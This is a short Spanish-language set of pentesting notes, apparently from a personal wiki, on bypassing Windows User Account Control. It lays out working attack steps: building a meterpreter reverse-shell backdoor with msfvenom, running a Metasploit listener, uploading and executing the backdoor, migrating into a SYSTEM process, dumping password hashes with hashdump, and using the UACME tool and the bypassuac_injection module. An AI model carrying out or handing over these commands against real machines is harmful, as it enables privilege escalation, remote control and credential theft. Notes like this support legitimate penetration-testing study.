UAC

UAC es el control de cuentas de usuario , hay varios niveles, mientras no este al máximo nivel, se puede vulnerar

Manual

Antes de ejecutar esto, si podemos migrar al proceso explorer es recomendable:

pgrep explorer : Esto nos da un numero migrate <numero>

Este exploit solo se puede ejecutar si el usuario que disponemos de bajos privilegios, pertenece al grupo de administradores.

Clonamos el repo: git clone https://github.com/hfiref0x/UACME (/root/Desktop/tools/UACME/)

Creamos un backdoor con msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe

Desde netcat/metasploit estamos en nuestro puerto de escucha (Usaré metasploit para este ejemplo)

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <Puerto configurado en el msfvenom previamente>
run

Para ver si el usuario tiene permisos de admin ponemos:

net user : Puede que devuelva admin como resultado

Ahora, nos vamos a nuestra cmd sin privilegios de windows y subimos el backdoor, si tenemos sesión de meterpreter abierta simplemente:

Recomendable crear o usar el directorio Tmp

Una vez ejecutado, nos vamos a la ventana donde tenemos en escucha el multi/handler o el netcat, y recibimos una consola con máximos privilegios

Listamos procesos:

ps

Y migramos a un proceso que ejecute NT AUTHORITY:

migrate <PID>

Para ver los hashes desde meterpreter (hay que salir de la shell) usamos:

meterpreter > hashdump

Metasploit (Recomendado)

Usamos el módulo: exploit/windows/local/bypassuac_injection

Última actualización